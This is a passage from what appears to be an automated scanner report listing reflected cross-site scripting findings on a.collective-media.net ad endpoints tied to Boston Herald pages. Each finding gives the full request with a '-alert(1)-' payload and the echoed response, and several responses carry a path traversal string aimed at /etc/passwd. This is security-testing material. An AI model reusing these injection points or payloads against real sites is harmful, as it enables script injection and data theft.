document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER?&787bc'-alert(1)-'bb972807ee4=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.9. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.revinet.bostonherald/audience

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48284'-alert(1)-'1a524591d7c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.revinet.bostonherald/audience;sz=160x600;ord=%23PCACHEBUSTER?48284'-alert(1)-'1a524591d7c HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 01:13:00 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea-dc7a1d176d75a886b936744456; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:13:00 GMT
Content-Length: 482

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER?48284'-alert(1)-'1a524591d7c;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.10. http://a.collective-media.net/adj/q1.bosherald/be_news [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/be_news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ae82'-alert(1)-'477998e8ab0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald3ae82'-alert(1)-'477998e8ab0/be_news;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/2118037356/Middle1/BostonHerald/quadrant1_newsROS300x250b_2010/quadrant1_newsROS300x250b_2010.html/4d686437616b35776e72734144666853?;ord=2118037356? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 455
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:46 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:46 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald3ae82'-alert(1)-'477998e8ab0/be_news;sz=300x250;net=q1;ord=2118037356?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.11. http://a.collective-media.net/adj/q1.bosherald/be_news [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/be_news

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac83b'-alert(1)-'4a7cc732c20 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/be_newsac83b'-alert(1)-'4a7cc732c20;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/2118037356/Middle1/BostonHerald/quadrant1_newsROS300x250b_2010/quadrant1_newsROS300x250b_2010.html/4d686437616b35776e72734144666853?;ord=2118037356? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 455
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:47 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:47 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/be_newsac83b'-alert(1)-'4a7cc732c20;sz=300x250;net=q1;ord=2118037356?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.12. http://a.collective-media.net/adj/q1.bosherald/be_news [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/be_news

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7fa92'-alert(1)-'ab795776af3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/be_news;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/2118037356/Middle1/BostonHerald/quadrant1_newsROS300x250b_2010/quadrant1_newsROS300x250b_2010.html/4d686437616b35776e72734144666853?;ord=2118037356?&7fa92'-alert(1)-'ab795776af3=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 458
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:44 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:44 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/be_news;sz=300x250;net=q1;ord=2118037356?&7fa92'-alert(1)-'ab795776af3=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.13. http://a.collective-media.net/adj/q1.bosherald/be_news [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/be_news

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5634a'-alert(1)-'72ece40b226 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/be_news;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/2118037356/Middle1/BostonHerald/quadrant1_newsROS300x250b_2010/quadrant1_newsROS300x250b_2010.html/4d686437616b35776e72734144666853?;ord=2118037356?5634a'-alert(1)-'72ece40b226 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 455
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:43 GMT
Connection: close
Set-Cookie: dc=sea-dc7a1d176d1ddf45fe985559f7; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:43 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/be_news;sz=300x250;net=q1;ord=2118037356?5634a'-alert(1)-'72ece40b226;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.14. http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/ent_fr

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a879'-alert(1)-'64a75099063 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald5a879'-alert(1)-'64a75099063/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1813138297/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/4d686437616b35776e72734144666853?;ord=1813138297? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 454
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:20:14 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:20:14 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald5a879'-alert(1)-'64a75099063/ent_fr;sz=300x250;net=q1;ord=1813138297?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.15. http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/ent_fr

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8840e'-alert(1)-'d174ab07fa0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/ent_fr8840e'-alert(1)-'d174ab07fa0;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1813138297/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/4d686437616b35776e72734144666853?;ord=1813138297? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 454
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:20:20 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:20:20 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/ent_fr8840e'-alert(1)-'d174ab07fa0;sz=300x250;net=q1;ord=1813138297?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.16. http://a.collective-media.net/adj/q1.bosherald/ent_fr [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/ent_fr

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b65f'-alert(1)-'bf030976c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1813138297/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/4d686437616b35776e72734144666853?;ord=1813138297?&2b65f'-alert(1)-'bf030976c6a=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 457
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:20:08 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:20:08 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/ent_fr;sz=300x250;net=q1;ord=1813138297?&2b65f'-alert(1)-'bf030976c6a=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.17. http://a.collective-media.net/adj/q1.bosherald/ent_fr [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/ent_fr

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cedc7'-alert(1)-'a9dad4ab33d was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1813138297/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/4d686437616b35776e72734144666853?;ord=1813138297?cedc7'-alert(1)-'a9dad4ab33d HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 454
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:20:01 GMT
Connection: close
Set-Cookie: dc=sea-dc7a1d176d2fd5b0e622cff9d7; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:20:01 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/ent_fr;sz=300x250;net=q1;ord=1813138297?cedc7'-alert(1)-'a9dad4ab33d;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.18. http://a.collective-media.net/adj/q1.bosherald/news [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2596'-alert(1)-'065299ab6fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosheraldf2596'-alert(1)-'065299ab6fa/news;sz=728x90;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/354527464/Top/BostonHerald/quadrant1_newsROS728x90a_2010/quadrant1_newsROS728x90a_0608.html/4d686437616b35776e72734144666853?;ord=354527464? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:46 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:46 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosheraldf2596'-alert(1)-'065299ab6fa/news;sz=728x90;net=q1;ord=354527464?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.19. http://a.collective-media.net/adj/q1.bosherald/news [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/news

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3b4c'-alert(1)-'8f565e9fc2f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald/newsf3b4c'-alert(1)-'8f565e9fc2f;sz=728x90;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/354527464/Top/BostonHerald/quadrant1_newsROS728x90a_2010/quadrant1_newsROS728x90a_0608.html/4d686437616b35776e72734144666853?;ord=354527464? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:46 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:46 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/newsf3b4c'-alert(1)-'8f565e9fc2f;sz=728x90;net=q1;ord=354527464?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.20. http://a.collective-media.net/adj/q1.bosherald/news [name of an arbitrarily supplied request parameter]  previous  next

Summary

